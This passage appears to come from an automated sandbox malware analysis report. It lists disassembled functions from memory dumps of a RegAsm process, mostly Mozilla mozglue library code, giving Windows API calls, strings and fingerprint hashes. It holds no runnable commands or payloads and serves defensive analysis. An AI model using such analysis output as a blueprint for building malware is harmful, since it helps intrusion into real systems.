                                                                            • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                            • String ID:
                                                                            • API String ID: 373919974-0
                                                                            • Opcode ID: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                            • Instruction ID: 6a8f297f6f97b9a3cf0514685df13ca52355f4dbaeb7c4ae4b28d527b4ace486
                                                                            • Opcode Fuzzy Hash: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                            • Instruction Fuzzy Hash: 5E01C031C00249DBCF20EBA8C9827EEBBB0EF40354F10411AE854A3281C7385B84C7D6
                                                                            Function 00410D6D Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocLocal
                                                                            • String ID:
                                                                            • API String ID: 3494564517-0
                                                                            • Opcode ID: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                            • Instruction ID: 7dcd19726911a1004ec6e1e6dff555a45da34f101be8258439f6e1c6d27db954
                                                                            • Opcode Fuzzy Hash: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                            • Instruction Fuzzy Hash: AAF05C35601610DB871209599C00AE7775BABC6B10708411BDE8C8B304C5B0ECC142E0

                                                                            Non-executed Functions

                                                                            Function 6CC46C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC46CCC
                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC46D11
                                                                            • moz_xmalloc.MOZGLUE(0000000C), ref: 6CC46D26
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CC46D35
                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC46D53
                                                                            • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CC46D73
                                                                            • free.MOZGLUE(00000000), ref: 6CC46D80
                                                                            • CertGetNameStringW.CRYPT32 ref: 6CC46DC0
                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CC46DDC
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC46DEB
                                                                            • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CC46DFF
                                                                            • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CC46E10
                                                                            • CryptMsgClose.CRYPT32(00000000), ref: 6CC46E27
                                                                            • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CC46E34
                                                                            • CreateFileW.KERNEL32 ref: 6CC46EF9
                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CC46F7D
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC46F8C
                                                                            • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CC4709D
                                                                            • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC47103
                                                                            • free.MOZGLUE(00000000), ref: 6CC47153
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC47176
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC47209
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4723A
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4726B
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4729C
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC472DC
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4730D
                                                                            • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CC473C2
                                                                            • VerSetConditionMask.NTDLL ref: 6CC473F3
                                                                            • VerSetConditionMask.NTDLL ref: 6CC473FF
                                                                            • VerSetConditionMask.NTDLL ref: 6CC47406
                                                                            • VerSetConditionMask.NTDLL ref: 6CC4740D
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC4741A
                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC4755A
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC47568
                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CC47585
                                                                            • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC47598
                                                                            • free.MOZGLUE(00000000), ref: 6CC475AC
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                            • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                            • API String ID: 3256780453-3980470659
                                                                            • Opcode ID: a43fcaac022fb778192a291195d200fc41c50660bb0b5041e876488aff6ce664
                                                                            • Instruction ID: b2ad0393ad0a2950369a9f34186a438842b6a6ed6c24aff6d90f3e4af8f3011c
                                                                            • Opcode Fuzzy Hash: a43fcaac022fb778192a291195d200fc41c50660bb0b5041e876488aff6ce664
                                                                            • Instruction Fuzzy Hash: 9B52C3B5A002149FEB21DF65CC84BAA77B8FF46704F10C199E909A7640EB71AF85CF91
                                                                            Function 6CC7F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7F09B
                                                                              • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                              • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                              • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                              • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC7F0AC
                                                                              • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                              • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC7F0BE
                                                                              • Part of subcall function 6CC55C50: __aulldiv.LIBCMT ref: 6CC55DB4
                                                                              • Part of subcall function 6CC55C50: LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC7F155
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F1E0
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F1ED
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F212
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F229
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F231
                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F248
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F2AE
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F2BB
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F2F8
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F350
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F35D
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F381
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F398
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F3A0
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F489
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F491
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F3CF
                                                                              • Part of subcall function 6CC7F070: GetCurrentThreadId.KERNEL32 ref: 6CC7F440
                                                                              • Part of subcall function 6CC7F070: AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F44D
                                                                              • Part of subcall function 6CC7F070: ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F472
                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F4A8
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F559
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F561
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F577
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F585
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F5A3
                                                                            Strings
                                                                            • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC7F56A
                                                                            • [I %d/%d] profiler_resume_sampling, xrefs: 6CC7F499
                                                                            • [I %d/%d] profiler_pause_sampling, xrefs: 6CC7F3A8
                                                                            • [I %d/%d] profiler_resume, xrefs: 6CC7F239
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                            • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                            • API String ID: 565197838-2840072211
                                                                            • Opcode ID: 589ce5dd8be659e0a4885ea65a7401d2daef75430740c39d40621bcb45f8e8c9
                                                                            • Instruction ID: d9f5fd634b95f1a07382b130cba07e18aeef792666b300a5973f8d0c8ac5d279
                                                                            • Opcode Fuzzy Hash: 589ce5dd8be659e0a4885ea65a7401d2daef75430740c39d40621bcb45f8e8c9
                                                                            • Instruction Fuzzy Hash: FDD1383D7042148FDB109FF9D4987AAB7B8EB46328F14451AF95593F81EB705808CBBA
                                                                            Function 6CC464C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CC464DF
                                                                            • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CC464F2
                                                                            • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CC46505
                                                                            • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CC46518
                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC4652B
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC4671C
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC46724
                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC4672F
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC46759
                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC46764
                                                                            • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CC46A80
                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC46ABE
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC46AD3
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC46AE8
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC46AF7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                            • API String ID: 487479824-2878602165
                                                                            • Opcode ID: f3652298cfaf84afb1478c85229df9775f1e14ea5c2caa6f2727f11e30230c02
                                                                            • Instruction ID: 0c5addb11b1d7d17326ea920779962a00a71723b413463e1f4d38d0b57080ddc
                                                                            • Opcode Fuzzy Hash: f3652298cfaf84afb1478c85229df9775f1e14ea5c2caa6f2727f11e30230c02
                                                                            • Instruction Fuzzy Hash: 28F1D470A05A199FDB20CF65CC8879AB7B4AF46318F14C299E809A7645F771AE84CF90
                                                                            Function 6CC7E2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,6CC7E2A6), ref: 6CC7E35E
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6CC7E2A6), ref: 6CC7E386
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E3E4
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E3F1
                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CC7E4AB
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E4F5
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E577
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E584
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E5DE
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC7E8A6
                                                                              • Part of subcall function 6CC3B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CC3B7CF
                                                                              • Part of subcall function 6CC3B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B808
                                                                              • Part of subcall function 6CC8B800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6CCB0FB6,00000000,?,?,6CC7E69E), ref: 6CC8B830
                                                                            • memset.VCRUNTIME140(?,00000000,00000000), ref: 6CC7E6DA
                                                                              • Part of subcall function 6CC8B8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6CC8B916
                                                                              • Part of subcall function 6CC8B8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6CC8B94A
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC7E864
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E883
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
                                                                            • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                            • API String ID: 2698983630-53385798
                                                                            • Opcode ID: b1e4d4191256c55da55263a9f6882a40acc5fc1006c964abaef0534952ca83e2
                                                                            • Instruction ID: 4de75522b9607cb6719b6e3a0f9dd521e6e79342945ae7a31e9555a065a2039c
                                                                            • Opcode Fuzzy Hash: b1e4d4191256c55da55263a9f6882a40acc5fc1006c964abaef0534952ca83e2
                                                                            • Instruction Fuzzy Hash: 8D02AE766003059FCB10CF68C484AAAB7F5FF89308F14452DE85A97B51EB34E945CFA1
                                                                            Function 6CC77E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpystrlen
                                                                            • String ID: (pre-xul)$data$name$schema
                                                                            • API String ID: 3412268980-999448898
                                                                            • Opcode ID: 39fb32376040c5170ac8d800e7e73b0680ce11a4aa51ee9a59cfc14c6f763220
                                                                            • Instruction ID: 4d56c689506c449e9a612656d41bc76c7497c97c30b12ef846419548ae7a4176
                                                                            • Opcode Fuzzy Hash: 39fb32376040c5170ac8d800e7e73b0680ce11a4aa51ee9a59cfc14c6f763220
                                                                            • Instruction Fuzzy Hash: 67E18FB1A043418FC714CF68884065BFBE9FBC5354F14892DE899E7791EB70ED098B92
                                                                            Function 6CC5D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D4F2
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D50B
                                                                              • Part of subcall function 6CC3CFE0: EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                              • Part of subcall function 6CC3CFE0: LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D52E
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D690
                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC5D6A6
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D712
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D751
                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC5D7EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                            • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                            • API String ID: 2690322072-3894294050
                                                                            • Opcode ID: e12a021372435bc0d4eb110af38802f9dff84df59c5e61e4c8fbc90647dea768
                                                                            • Instruction ID: 3a1904b411e8ecb7703ff20645f2cf63c177bf90dee054111eecc66439d545a9
                                                                            • Opcode Fuzzy Hash: e12a021372435bc0d4eb110af38802f9dff84df59c5e61e4c8fbc90647dea768
                                                                            • Instruction Fuzzy Hash: 68910271A047418FD714CF69C29022AB7F1FB89744F54892EE45AD7B84FB30E861CB8A
                                                                            Function 6CC94EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(000007D0), ref: 6CC94EFF
                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC94F2E
                                                                            • moz_xmalloc.MOZGLUE ref: 6CC94F52
                                                                            • memset.VCRUNTIME140(00000000,00000000), ref: 6CC94F62
                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC952B2
                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC952E6
                                                                            • Sleep.KERNEL32(00000010), ref: 6CC95481
                                                                            • free.MOZGLUE(?), ref: 6CC95498
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                            • String ID: (
                                                                            • API String ID: 4104871533-3887548279
                                                                            • Opcode ID: 204183b29151d107b00e1fa882b610387a87ab6b0e9d0cf3b0697dbc30ddd467
                                                                            • Instruction ID: bef3cfb0d40f4835ba05d26199991e5acd628ad4c6065d02491ebc1adfa071c2
                                                                            • Opcode Fuzzy Hash: 204183b29151d107b00e1fa882b610387a87ab6b0e9d0cf3b0697dbc30ddd467
                                                                            • Instruction Fuzzy Hash: 0FF1F375A18B008FC716CF78C85062BB7F9AFD6384F05872EF846A7651EB31D8468B81
                                                                            Function 6CC47810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744), ref: 6CC47885
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE744), ref: 6CC478A5
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC478AD
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC478CD
